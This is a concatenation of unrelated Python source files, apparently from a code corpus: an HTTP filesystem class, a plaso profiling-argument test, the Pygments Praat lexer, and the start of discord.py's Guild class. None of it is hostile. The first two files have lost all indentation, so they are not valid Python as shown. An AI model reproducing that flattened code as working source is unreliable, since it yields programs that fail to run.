AbstractFileSystem.__init__(self)
self.block_size = storage_options.pop('block_size', DEFAULT_BLOCK_SIZE)
self.simple_links = storage_options.pop('simple_links', True)
self.kwargs = storage_options
self.session = requests.Session()
def _strip_protocol(self, path):
""" For HTTP, we always want to keep the full URL
"""
return path
def ls(self, url, detail=True):
# ignoring URL-encoded arguments
r = requests.get(url, **self.kwargs)
if self.simple_links:
links = ex2.findall(r.text) + ex.findall(r.text)
else:
links = ex.findall(r.text)
out = set()
for l in links:
if isinstance(l, tuple):
l = l[1]
if l.startswith('http'):
if l.replace('https', 'http').startswith(
url.replace('https', 'http')):
out.add(l)
else:
if l not in ['..', '../']:
# Ignore FTP-like "parent"
out.add('/'.join([url.rstrip('/'), l.lstrip('/')]))
if detail:
return [{'name': u, 'type': 'directory'
if u.endswith('/') else 'file'} for u in out]
else:
return list(sorted(out))
def cat(self, url):
r = requests.get(url, **self.kwargs)
r.raise_for_status()
return r.content
def mkdirs(self, url):
"""Make any intermediate directories to make path writable"""
raise NotImplementedError
def _open(self, url, mode='rb', block_size=None, **kwargs):
"""Make a file-like object
Parameters
----------
url: str
Full URL with protocol
mode: string
must be "rb"
block_size: int or None
Bytes to download in one request; use instance value if None.
kwargs: key-value
Any other parameters, passed to requests calls
"""
if mode != 'rb':
raise NotImplementedError
block_size = block_size if block_size is not None else self.block_size
kw = self.kwargs.copy()
kw.update(kwargs)
kw.pop('autocommit', None)
if block_size:
return HTTPFile(url, self.session, block_size, **kw)
else:
kw['stream'] = True
r = self.session.get(url, **kw)
r.raise_for_status()
r.raw.decode_content = True
return r.raw
def ukey(self, url):
"""Unique identifier; assume HTTP files are static, unchanging"""
return tokenize(url, self.kwargs, self.protocol)
def size(self, url):
"""Size in bytes of the file at path"""
return file_size(url, session=self.session, **self.kwargs)
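# Usage sketch (the URL is illustrative, not part of this module):
#   fs = HTTPFileSystem(simple_links=True)
#   links = fs.ls('https://example.com/data/', detail=False)
#   with fs.open(links[0], block_size=2 ** 20) as f:
#       head = f.read(1024)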
class HTTPFile(object):
"""
    A file-like object pointing to a remote HTTP(S) resource
    Supports only reading, with read-ahead of a predetermined block-size.
In the case that the server does not supply the filesize, only reading of
the complete file in one go is supported.
Parameters
----------
url: str
Full URL of the remote resource, including the protocol
session: requests.Session or None
All calls will be made within this session, to avoid restarting
connections where the server allows this
block_size: int or None
The amount of read-ahead to do, in bytes. Default is 5MB, or the value
configured for the FileSystem creating this file
    kwargs: all other key-values are passed to requests calls.
"""
def __init__(self, url, session=None, block_size=None, **kwargs):
self.url = url
self.kwargs = kwargs
self.loc = 0
self.session = session if session is not None else requests.Session()
self.blocksize = (block_size if block_size is not None
else DEFAULT_BLOCK_SIZE)
try:
self.size = file_size(url, self.session, allow_redirects=True,
**self.kwargs)
except (ValueError, requests.HTTPError):
# No size information - only allow read() and no seek()
self.size = None
self.cache = None
self.closed = False
self.start = None
self.end = None
def seek(self, where, whence=0):
"""Set file position
Parameters
----------
where: int
Location to set
whence: int (default 0)
If zero, set from start of file (value should be positive); if 1,
set relative to current position; if 2, set relative to end of file
            (value should be negative)
Returns the position.
"""
if self.size is None and (where, whence) not in [(0, 0), (0, 1)]:
raise ValueError('Cannot seek since size of file is not known')
if whence == 0:
nloc = where
elif whence == 1:
nloc = self.loc + where
elif whence == 2:
nloc = self.size + where
else:
            raise ValueError('Whence must be in [0, 1, 2], but got %s' % whence)
if nloc < 0:
raise ValueError('Seek before start of file')
self.loc = nloc
return nloc
def tell(self):
"""Get current file byte position"""
return self.loc
def read(self, length=-1):
"""Read bytes from file
Parameters
----------
length: int
Read up to this many bytes. If negative, read all content to end of
file. If the server has not supplied the filesize, attempting to
read only part of the data will raise a ValueError.
"""
if length == 0:
# asked for no data, so supply no data and shortcut doing work
return b''
if self.size is None:
if length >= 0:
# asked for specific amount of data, but we don't know how
# much is available
raise ValueError('File size is unknown, must read all data')
else:
# asked for whole file
return self._fetch_all()
if length < 0 and self.loc == 0:
# size was provided, but asked for whole file, so shortcut
return self._fetch_all()
if length < 0 or self.loc + length > self.size:
end = self.size
else:
end = self.loc + length
if self.loc >= self.size:
# EOF (python files don't error, just return no data)
return b''
        self._fetch(self.loc, end)
data = self.cache[self.loc - self.start:end - self.start]
self.loc = end
return data
def _fetch(self, start, end):
"""Set new bounds for data cache and fetch data, if required"""
if self.start is None and self.end is None:
# First read
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(start, self.end)
elif start < self.start:
if self.end - end > self.blocksize:
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(self.start, self.end)
else:
new = self._fetch_range(start, self.start)
self.start = start
self.cache = new + self.cache
elif end > self.end:
if self.end > self.size:
return
if end - self.end > self.blocksize:
self.start = start
self.end = end + self.blocksize
self.cache = self._fetch_range(self.start, self.end)
else:
new = self._fetch_range(self.end, end + self.blocksize)
self.end = end + self.blocksize
self.cache = self.cache + new
def _fetch_all(self):
"""Read whole file in one shot, without caching
This is only called when size is None or position is still at zero,
and read() is called without a byte-count.
"""
r = self.session.get(self.url, **self.kwargs)
r.raise_for_status()
out = r.content
# set position to end of data; actually expect file might close shortly
l = len(out)
if l < self.blocksize:
# actually all data fits in one block, so cache
self.start = 0
self.end = l
self.cache = out
self.size = l
self.loc = len(out)
return out
def _fetch_range(self, start, end):
"""Download a block of data
The expectation is that the server returns only the requested bytes,
with HTTP code 206. If this is not the case, we first check the headers,
and then stream the output - if the data size is bigger than we
requested, an exception is raised.
"""
kwargs = self.kwargs.copy()
        headers = kwargs.pop('headers', {})
headers['Range'] = 'bytes=%i-%i' % (start, end - 1)
r = self.session.get(self.url, headers=headers, stream=True, **kwargs)
r.raise_for_status()
if r.status_code == 206:
# partial content, as expected
return r.content
if 'Content-Length' in r.headers:
cl = int(r.headers['Content-Length'])
if cl <= end - start:
# data size OK
return r.content
else:
raise ValueError('Got more bytes (%i) than requested (%i)' % (
cl, end - start))
cl = 0
out = []
for chunk in r.iter_content(chunk_size=2 ** 20):
# data size unknown, let's see if it goes too big
if chunk:
out.append(chunk)
cl += len(chunk)
if cl > end - start:
raise ValueError(
'Got more bytes so far (>%i) than requested (%i)' % (
cl, end - start))
else:
break
return b''.join(out)
def __enter__(self):
self.loc = 0
return self
def __exit__(self, *args):
self.close()
def __iter__(self):
# no text lines here, use TextIOWrapper
raise NotImplementedError
def write(self):
raise NotImplementedError
def flush(self):
pass
def close(self):
self.closed = True
def seekable(self):
return True
def writable(self):
return False
def readable(self):
return True
def file_size(url, session, **kwargs):
"""Call HEAD on the server to get file size
Default operation is to explicitly allow redirects and use encoding
'identity' (no compression) to get the true size of the target.
"""
kwargs = kwargs.copy()
ar = kwargs.pop('allow_redirects', True)
head = kwargs.get('headers', {})
if 'Accept-Encoding' not in head:
head['Accept-Encoding'] = 'identity'
r = session.head(url, allow_redirects=ar, **kwargs)
r.raise_for_status()
if 'Content-Length' in r.headers:
return int(r.headers['Content-Length'])
else:
raise ValueError("Server did not supply size of %s" % url)
|
the-stack_0_3742 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the profiling CLI arguments helper."""
from __future__ import unicode_literals
import argparse
import unittest
from plaso.cli import tools
from plaso.cli.helpers import profiling
from plaso.lib import errors
from tests import test_lib as shared_test_lib
from tests.cli import test_lib as cli_test_lib
class ProfilingArgumentsHelperTest(cli_test_lib.CLIToolTestCase):
"""Tests for the profiling CLI arguments helper."""
# pylint: disable=protected-access
_EXPECTED_OUTPUT = """\
usage: cli_helper.py [--profilers PROFILERS_LIST]
[--profiling_directory DIRECTORY]
[--profiling_sample_rate SAMPLE_RATE]
Test argument parser.
optional arguments:
--profilers PROFILERS_LIST
List of profilers to use by the tool. This is a comma
separated list where each entry is the name of a
profiler. Use "--profilers list" to list the available
profilers.
--profiling_directory DIRECTORY, --profiling-directory DIRECTORY
Path to the directory that should be used to store the
profiling sample files. By default the sample files
are stored in the current working directory.
--profiling_sample_rate SAMPLE_RATE, --profiling-sample-rate SAMPLE_RATE
Profiling sample rate (defaults to a sample every 1000
files).
"""
def testAddArguments(self):
"""Tests the AddArguments function."""
argument_parser = argparse.ArgumentParser(
prog='cli_helper.py', description='Test argument parser.',
add_help=False,
formatter_class=cli_test_lib.SortedArgumentsHelpFormatter)
profiling.ProfilingArgumentsHelper.AddArguments(argument_parser)
output = self._RunArgparseFormatHelp(argument_parser)
self.assertEqual(output, self._EXPECTED_OUTPUT)
def testParseOptions(self):
"""Tests the ParseOptions function."""
# pylint: disable=no-member
test_tool = tools.CLITool()
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = '100'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
self.assertEqual(test_tool._profiling_sample_rate, 100)
with shared_test_lib.TempDirectory() as temp_directory:
options = cli_test_lib.TestOptions()
options.profilers = 'processing'
options.profiling_directory = temp_directory
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
self.assertEqual(test_tool._profilers, set(['processing']))
self.assertEqual(test_tool._profiling_directory, temp_directory)
self.assertEqual(test_tool._profiling_sample_rate, 1000)
with self.assertRaises(errors.BadConfigObject):
options = cli_test_lib.TestOptions()
profiling.ProfilingArgumentsHelper.ParseOptions(options, None)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profilers = 'bogus'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_directory = '/bogus'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = 'a'
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
with self.assertRaises(errors.BadConfigOption):
options = cli_test_lib.TestOptions()
options.profiling_sample_rate = 100
profiling.ProfilingArgumentsHelper.ParseOptions(options, test_tool)
if __name__ == '__main__':
unittest.main()
|
the-stack_0_3743 | # -*- coding: utf-8 -*-
"""
pygments.lexers.praat
~~~~~~~~~~~~~~~~~~~~~
Lexer for Praat
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer, words, bygroups, include
from pygments.token import Name, Text, Comment, Keyword, String, Punctuation, Number, \
Operator
__all__ = ['PraatLexer']
class PraatLexer(RegexLexer):
"""
For `Praat <http://www.praat.org>`_ scripts.
.. versionadded:: 2.1
"""
name = 'Praat'
aliases = ['praat']
filenames = ['*.praat', '*.proc', '*.psc']
keywords = (
'if', 'then', 'else', 'elsif', 'elif', 'endif', 'fi', 'for', 'from', 'to',
'endfor', 'endproc', 'while', 'endwhile', 'repeat', 'until', 'select', 'plus',
'minus', 'demo', 'assert', 'stopwatch', 'nocheck', 'nowarn', 'noprogress',
'editor', 'endeditor', 'clearinfo',
)
functions_string = (
'backslashTrigraphsToUnicode', 'chooseDirectory', 'chooseReadFile',
'chooseWriteFile', 'date', 'demoKey', 'do', 'environment', 'extractLine',
'extractWord', 'fixed', 'info', 'left', 'mid', 'percent', 'readFile', 'replace',
'replace_regex', 'right', 'selected', 'string', 'unicodeToBackslashTrigraphs',
)
functions_numeric = (
'abs', 'appendFile', 'appendFileLine', 'appendInfo', 'appendInfoLine', 'arccos',
'arccosh', 'arcsin', 'arcsinh', 'arctan', 'arctan2', 'arctanh', 'barkToHertz',
'beginPause', 'beginSendPraat', 'besselI', 'besselK', 'beta', 'beta2',
'binomialP', 'binomialQ', 'boolean', 'ceiling', 'chiSquareP', 'chiSquareQ',
'choice', 'comment', 'cos', 'cosh', 'createDirectory', 'deleteFile',
'demoClicked', 'demoClickedIn', 'demoCommandKeyPressed',
'demoExtraControlKeyPressed', 'demoInput', 'demoKeyPressed',
'demoOptionKeyPressed', 'demoShiftKeyPressed', 'demoShow', 'demoWaitForInput',
'demoWindowTitle', 'demoX', 'demoY', 'differenceLimensToPhon', 'do', 'editor',
'endPause', 'endSendPraat', 'endsWith', 'erb', 'erbToHertz', 'erf', 'erfc',
'exitScript', 'exp', 'extractNumber', 'fileReadable', 'fisherP', 'fisherQ',
'floor', 'gaussP', 'gaussQ', 'hertzToBark', 'hertzToErb', 'hertzToMel',
'hertzToSemitones', 'imax', 'imin', 'incompleteBeta', 'incompleteGammaP', 'index',
'index_regex', 'invBinomialP', 'invBinomialQ', 'invChiSquareQ', 'invFisherQ',
'invGaussQ', 'invSigmoid', 'invStudentQ', 'length', 'ln', 'lnBeta', 'lnGamma',
'log10', 'log2', 'max', 'melToHertz', 'min', 'minusObject', 'natural', 'number',
'numberOfColumns', 'numberOfRows', 'numberOfSelected', 'objectsAreIdentical',
'option', 'optionMenu', 'pauseScript', 'phonToDifferenceLimens', 'plusObject',
'positive', 'randomBinomial', 'randomGauss', 'randomInteger', 'randomPoisson',
'randomUniform', 'real', 'readFile', 'removeObject', 'rindex', 'rindex_regex',
'round', 'runScript', 'runSystem', 'runSystem_nocheck', 'selectObject',
'selected', 'semitonesToHertz', 'sentencetext', 'sigmoid', 'sin', 'sinc',
'sincpi', 'sinh', 'soundPressureToPhon', 'sqrt', 'startsWith', 'studentP',
'studentQ', 'tan', 'tanh', 'variableExists', 'word', 'writeFile', 'writeFileLine',
'writeInfo', 'writeInfoLine',
)
functions_array = (
'linear', 'randomGauss', 'randomInteger', 'randomUniform', 'zero',
)
objects = (
'Activation', 'AffineTransform', 'AmplitudeTier', 'Art', 'Artword',
'Autosegment', 'BarkFilter', 'BarkSpectrogram', 'CCA', 'Categories',
'Cepstrogram', 'Cepstrum', 'Cepstrumc', 'ChebyshevSeries', 'ClassificationTable',
'Cochleagram', 'Collection', 'ComplexSpectrogram', 'Configuration', 'Confusion',
'ContingencyTable', 'Corpus', 'Correlation', 'Covariance',
'CrossCorrelationTable', 'CrossCorrelationTables', 'DTW', 'DataModeler',
'Diagonalizer', 'Discriminant', 'Dissimilarity', 'Distance', 'Distributions',
'DurationTier', 'EEG', 'ERP', 'ERPTier', 'EditCostsTable', 'EditDistanceTable',
'Eigen', 'Excitation', 'Excitations', 'ExperimentMFC', 'FFNet', 'FeatureWeights',
'FileInMemory', 'FilesInMemory', 'Formant', 'FormantFilter', 'FormantGrid',
'FormantModeler', 'FormantPoint', 'FormantTier', 'GaussianMixture', 'HMM',
'HMM_Observation', 'HMM_ObservationSequence', 'HMM_State', 'HMM_StateSequence',
'Harmonicity', 'ISpline', 'Index', 'Intensity', 'IntensityTier', 'IntervalTier',
'KNN', 'KlattGrid', 'KlattTable', 'LFCC', 'LPC', 'Label', 'LegendreSeries',
'LinearRegression', 'LogisticRegression', 'LongSound', 'Ltas', 'MFCC', 'MSpline',
'ManPages', 'Manipulation', 'Matrix', 'MelFilter', 'MelSpectrogram',
'MixingMatrix', 'Movie', 'Network', 'OTGrammar', 'OTHistory', 'OTMulti', 'PCA',
'PairDistribution', 'ParamCurve', 'Pattern', 'Permutation', 'Photo', 'Pitch',
'PitchModeler', 'PitchTier', 'PointProcess', 'Polygon', 'Polynomial',
'PowerCepstrogram', 'PowerCepstrum', 'Procrustes', 'RealPoint', 'RealTier',
'ResultsMFC', 'Roots', 'SPINET', 'SSCP', 'SVD', 'Salience', 'ScalarProduct',
'Similarity', 'SimpleString', 'SortedSetOfString', 'Sound', 'Speaker',
'Spectrogram', 'Spectrum', 'SpectrumTier', 'SpeechSynthesizer', 'SpellingChecker',
'Strings', 'StringsIndex', 'Table', 'TableOfReal', 'TextGrid', 'TextInterval',
'TextPoint', 'TextTier', 'Tier', 'Transition', 'VocalTract', 'VocalTractTier',
'Weight', 'WordList',
)
variables_numeric = (
'macintosh', 'windows', 'unix', 'praatVersion', 'pi', 'e', 'undefined',
)
variables_string = (
'praatVersion', 'tab', 'shellDirectory', 'homeDirectory',
'preferencesDirectory', 'newline', 'temporaryDirectory',
'defaultDirectory',
)
tokens = {
'root': [
(r'(\s+)(#.*?$)', bygroups(Text, Comment.Single)),
(r'^#.*?$', Comment.Single),
(r';[^\n]*', Comment.Single),
(r'\s+', Text),
(r'\bprocedure\b', Keyword, 'procedure_definition'),
(r'\bcall\b', Keyword, 'procedure_call'),
(r'@', Name.Function, 'procedure_call'),
include('function_call'),
(words(keywords, suffix=r'\b'), Keyword),
(r'(\bform\b)(\s+)([^\n]+)',
bygroups(Keyword, Text, String), 'old_form'),
(r'(print(?:line|tab)?|echo|exit|asserterror|pause|send(?:praat|socket)|'
r'include|execute|system(?:_nocheck)?)(\s+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(goto|label)(\s+)(\w+)', bygroups(Keyword, Text, Name.Label)),
include('variable_name'),
include('number'),
(r'"', String, 'string'),
(words((objects), suffix=r'(?=\s+\S+\n)'), Name.Class, 'string_unquoted'),
(r'\b[A-Z]', Keyword, 'command'),
(r'(\.{3}|[)(,])', Punctuation),
],
'command': [
(r'( ?[\w()-]+ ?)', Keyword),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r'\.{3}', Keyword, ('#pop', 'old_arguments')),
(r':', Keyword, ('#pop', 'comma_list')),
(r'\s', Text, '#pop'),
],
'procedure_call': [
(r'\s+', Text),
(r'([\w.]+)(:|\s*\()',
bygroups(Name.Function, Text), '#pop'),
(r'([\w.]+)', Name.Function, ('#pop', 'old_arguments')),
],
'procedure_definition': [
(r'\s', Text),
(r'([\w.]+)(\s*?[(:])',
bygroups(Name.Function, Text), '#pop'),
(r'([\w.]+)([^\n]*)',
bygroups(Name.Function, Text), '#pop'),
],
'function_call': [
(words(functions_string, suffix=r'\$(?=\s*[:(])'), Name.Function, 'function'),
(words(functions_array, suffix=r'#(?=\s*[:(])'), Name.Function, 'function'),
(words(functions_numeric, suffix=r'(?=\s*[:(])'), Name.Function, 'function'),
],
'function': [
(r'\s+', Text),
(r':', Punctuation, ('#pop', 'comma_list')),
(r'\s*\(', Punctuation, ('#pop', 'comma_list')),
],
'comma_list': [
(r'(\s*\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'(\s*[])\n])', Text, '#pop'),
(r'\s+', Text),
(r'"', String, 'string'),
(r'\b(if|then|else|fi|endif)\b', Keyword),
include('function_call'),
include('variable_name'),
include('operator'),
include('number'),
(r'[()]', Text),
(r',', Punctuation),
],
'old_arguments': [
(r'\n', Text, '#pop'),
include('variable_name'),
include('operator'),
include('number'),
(r'"', String, 'string'),
(r'[^\n]', Text),
],
'number': [
(r'\n', Text, '#pop'),
(r'\b\d+(\.\d*)?([eE][-+]?\d+)?%?', Number),
],
'object_attributes': [
(r'\.?(n(col|row)|[xy]min|[xy]max|[nd][xy])\b', Name.Builtin, '#pop'),
(r'(\.?(?:col|row)\$)(\[)',
bygroups(Name.Builtin, Text), 'variable_name'),
(r'(\$?)(\[)',
bygroups(Name.Builtin, Text), ('#pop', 'comma_list')),
],
'variable_name': [
include('operator'),
include('number'),
(words(variables_string, suffix=r'\$'), Name.Variable.Global),
(words(variables_numeric, suffix=r'\b'), Name.Variable.Global),
(r'\bObject_\w+', Name.Builtin, 'object_attributes'),
(words(objects, prefix=r'\b', suffix=r'_\w+'),
Name.Builtin, 'object_attributes'),
(r"\b(Object_)(')",
bygroups(Name.Builtin, String.Interpol),
('object_attributes', 'string_interpolated')),
(words(objects, prefix=r'\b', suffix=r"(_)(')"),
bygroups(Name.Builtin, Name.Builtin, String.Interpol),
('object_attributes', 'string_interpolated')),
(r'\.?_?[a-z][\w.]*(\$|#)?', Text),
(r'[\[\]]', Punctuation, 'comma_list'),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
],
'operator': [
(r'([+\/*<>=!-]=?|[&*|][&*|]?|\^|<>)', Operator),
(r'(?<![\w.])(and|or|not|div|mod)(?![\w.])', Operator.Word),
],
'string_interpolated': [
(r'\.?[_a-z][\w.]*[$#]?(?:\[[a-zA-Z0-9,]+\])?(:[0-9]+)?',
String.Interpol),
(r"'", String.Interpol, '#pop'),
],
'string_unquoted': [
(r'(\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'\n', Text, '#pop'),
(r'\s', Text),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r"'", String),
(r"[^'\n]+", String),
],
'string': [
(r'(\n\s*)(\.{3})', bygroups(Text, Punctuation)),
(r'"', String, '#pop'),
(r"'(?=.*')", String.Interpol, 'string_interpolated'),
(r"'", String),
(r'[^\'"\n]+', String),
],
'old_form': [
(r'\s+', Text),
(r'(optionmenu|choice)([ \t]+\S+:[ \t]+)',
bygroups(Keyword, Text), 'number'),
(r'(option|button)([ \t]+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(sentence|text)([ \t]+\S+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'(word)([ \t]+\S+[ \t]*)(\S+)?([ \t]+.*)?',
bygroups(Keyword, Text, String, Text)),
(r'(boolean)(\s+\S+\s*)(0|1|"?(?:yes|no)"?)',
bygroups(Keyword, Text, Name.Variable)),
            # Ideally processing of the number would happen in the 'number'
            # state, but that doesn't seem to work
(r'(real|natural|positive|integer)([ \t]+\S+[ \t]*)([+-]?)(\d+(?:\.\d*)?'
r'(?:[eE][-+]?\d+)?%?)',
bygroups(Keyword, Text, Operator, Number)),
(r'(comment)(\s+)',
bygroups(Keyword, Text), 'string_unquoted'),
(r'\bendform\b', Keyword, '#pop'),
]
}
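# Usage sketch (added for illustration, not part of the original lexer module):
# drive the lexer through the standard pygments API. The Praat snippet below is
# made up.
if __name__ == '__main__':  # pragma: no cover
    from pygments import highlight
    from pygments.formatters import TerminalFormatter
    _sample = (
        'form Greeting\n'
        '    word Name world\n'
        'endform\n'
        'writeInfoLine: "Hello ", name$\n'
    )
    print(highlight(_sample, PraatLexer(), TerminalFormatter()))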
|
the-stack_0_3745 | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import copy
from collections import namedtuple
from typing import List, TYPE_CHECKING
from . import utils, abc
from .role import Role
from .member import Member, VoiceState
from .emoji import Emoji
from .errors import InvalidData
from .permissions import PermissionOverwrite
from .colour import Colour
from .errors import InvalidArgument, ClientException
from .channel import *
from .enums import VoiceRegion, ChannelType, try_enum, VerificationLevel, ContentFilter, NotificationLevel
from .mixins import Hashable
from .user import User
from .invite import Invite
from .iterators import AuditLogIterator, MemberIterator
from .widget import Widget
from .asset import Asset
from .flags import SystemChannelFlags
from .integrations import Integration
__all__ = (
'Guild',
)
if TYPE_CHECKING:
from .types.guild import (
Ban as BanPayload
)
BanEntry = namedtuple('BanEntry', 'reason user')
_GuildLimit = namedtuple('_GuildLimit', 'emoji bitrate filesize')
class Guild(Hashable):
"""Represents a Discord guild.
This is referred to as a "server" in the official Discord UI.
.. container:: operations
.. describe:: x == y
Checks if two guilds are equal.
.. describe:: x != y
Checks if two guilds are not equal.
.. describe:: hash(x)
Returns the guild's hash.
.. describe:: str(x)
Returns the guild's name.
Attributes
----------
name: :class:`str`
The guild name.
emojis: Tuple[:class:`Emoji`, ...]
All emojis that the guild owns.
region: :class:`VoiceRegion`
The region the guild belongs on. There is a chance that the region
will be a :class:`str` if the value is not recognised by the enumerator.
afk_timeout: :class:`int`
The timeout to get sent to the AFK channel.
afk_channel: Optional[:class:`VoiceChannel`]
The channel that denotes the AFK channel. ``None`` if it doesn't exist.
icon: Optional[:class:`str`]
The guild's icon.
id: :class:`int`
The guild's ID.
owner_id: :class:`int`
The guild owner's ID. Use :attr:`Guild.owner` instead.
unavailable: :class:`bool`
Indicates if the guild is unavailable. If this is ``True`` then the
        reliability of other attributes outside of :attr:`Guild.id` is slim and they might
all be ``None``. It is best to not do anything with the guild if it is unavailable.
Check the :func:`on_guild_unavailable` and :func:`on_guild_available` events.
max_presences: Optional[:class:`int`]
The maximum amount of presences for the guild.
max_members: Optional[:class:`int`]
The maximum amount of members for the guild.
.. note::
This attribute is only available via :meth:`.Client.fetch_guild`.
max_video_channel_users: Optional[:class:`int`]
The maximum amount of users in a video channel.
.. versionadded:: 1.4
banner: Optional[:class:`str`]
The guild's banner.
description: Optional[:class:`str`]
The guild's description.
mfa_level: :class:`int`
Indicates the guild's two factor authorisation level. If this value is 0 then
the guild does not require 2FA for their administrative members. If the value is
1 then they do.
verification_level: :class:`VerificationLevel`
The guild's verification level.
explicit_content_filter: :class:`ContentFilter`
The guild's explicit content filter.
default_notifications: :class:`NotificationLevel`
The guild's notification settings.
features: List[:class:`str`]
A list of features that the guild has. They are currently as follows:
- ``VIP_REGIONS``: Guild has VIP voice regions
- ``VANITY_URL``: Guild can have a vanity invite URL (e.g. discord.gg/discord-api)
- ``INVITE_SPLASH``: Guild's invite page can have a special splash.
- ``VERIFIED``: Guild is a verified server.
- ``PARTNERED``: Guild is a partnered server.
- ``MORE_EMOJI``: Guild is allowed to have more than 50 custom emoji.
- ``DISCOVERABLE``: Guild shows up in Server Discovery.
- ``FEATURABLE``: Guild is able to be featured in Server Discovery.
- ``COMMUNITY``: Guild is a community server.
- ``COMMERCE``: Guild can sell things using store channels.
- ``PUBLIC``: Guild is a public guild.
- ``NEWS``: Guild can create news channels.
- ``BANNER``: Guild can upload and use a banner (i.e. :meth:`banner_url`).
- ``ANIMATED_ICON``: Guild can upload an animated icon.
- ``PUBLIC_DISABLED``: Guild cannot be public.
- ``WELCOME_SCREEN_ENABLED``: Guild has enabled the welcome screen
- ``MEMBER_VERIFICATION_GATE_ENABLED``: Guild has Membership Screening enabled.
- ``PREVIEW_ENABLED``: Guild can be viewed before being accepted via Membership Screening.
splash: Optional[:class:`str`]
The guild's invite splash.
premium_tier: :class:`int`
The premium tier for this guild. Corresponds to "Nitro Server" in the official UI.
The number goes from 0 to 3 inclusive.
premium_subscription_count: :class:`int`
The number of "boosts" this guild currently has.
preferred_locale: Optional[:class:`str`]
The preferred locale for the guild. Used when filtering Server Discovery
results to a specific language.
discovery_splash: :class:`str`
The guild's discovery splash.
.. versionadded:: 1.3
"""
__slots__ = ('afk_timeout', 'afk_channel', '_members', '_channels', 'icon',
'name', 'id', 'unavailable', 'banner', 'region', '_state',
'_roles', '_member_count', '_large',
'owner_id', 'mfa_level', 'emojis', 'features',
'verification_level', 'explicit_content_filter', 'splash',
'_voice_states', '_system_channel_id', 'default_notifications',
'description', 'max_presences', 'max_members', 'max_video_channel_users',
'premium_tier', 'premium_subscription_count', '_system_channel_flags',
'preferred_locale', 'discovery_splash', '_rules_channel_id',
'_public_updates_channel_id')
_PREMIUM_GUILD_LIMITS = {
None: _GuildLimit(emoji=50, bitrate=96e3, filesize=8388608),
0: _GuildLimit(emoji=50, bitrate=96e3, filesize=8388608),
1: _GuildLimit(emoji=100, bitrate=128e3, filesize=8388608),
2: _GuildLimit(emoji=150, bitrate=256e3, filesize=52428800),
3: _GuildLimit(emoji=250, bitrate=384e3, filesize=104857600),
}
def __init__(self, *, data, state):
self._channels = {}
self._members = {}
self._voice_states = {}
self._state = state
self._from_data(data)
def _add_channel(self, channel):
self._channels[channel.id] = channel
def _remove_channel(self, channel):
self._channels.pop(channel.id, None)
def _voice_state_for(self, user_id):
return self._voice_states.get(user_id)
def _add_member(self, member):
self._members[member.id] = member
def _remove_member(self, member):
self._members.pop(member.id, None)
def __str__(self):
return self.name or ''
def __repr__(self):
attrs = (
('id', self.id),
('name', self.name),
('shard_id', self.shard_id),
('chunked', self.chunked),
('member_count', getattr(self, '_member_count', None)),
)
inner = ' '.join('%s=%r' % t for t in attrs)
return f'<Guild {inner}>'
def _update_voice_state(self, data, channel_id):
user_id = int(data['user_id'])
channel = self.get_channel(channel_id)
try:
# check if we should remove the voice state from cache
if channel is None:
after = self._voice_states.pop(user_id)
else:
after = self._voice_states[user_id]
before = copy.copy(after)
after._update(data, channel)
except KeyError:
# if we're here then we're getting added into the cache
after = VoiceState(data=data, channel=channel)
before = VoiceState(data=data, channel=None)
self._voice_states[user_id] = after
member = self.get_member(user_id)
if member is None:
try:
member = Member(data=data['member'], state=self._state, guild=self)
except KeyError:
member = None
return member, before, after
def _add_role(self, role):
# roles get added to the bottom (position 1, pos 0 is @everyone)
# so since self.roles has the @everyone role, we can't increment
# its position because it's stuck at position 0. Luckily x += False
# is equivalent to adding 0. So we cast the position to a bool and
# increment it.
for r in self._roles.values():
r.position += (not r.is_default())
self._roles[role.id] = role
def _remove_role(self, role_id):
# this raises KeyError if it fails..
role = self._roles.pop(role_id)
# since it didn't, we can change the positions now
# basically the same as above except we only decrement
# the position if we're above the role we deleted.
for r in self._roles.values():
r.position -= r.position > role.position
return role
def _from_data(self, guild):
# according to Stan, this is always available even if the guild is unavailable
# I don't have this guarantee when someone updates the guild.
member_count = guild.get('member_count', None)
if member_count is not None:
self._member_count = member_count
self.name = guild.get('name')
self.region = try_enum(VoiceRegion, guild.get('region'))
self.verification_level = try_enum(VerificationLevel, guild.get('verification_level'))
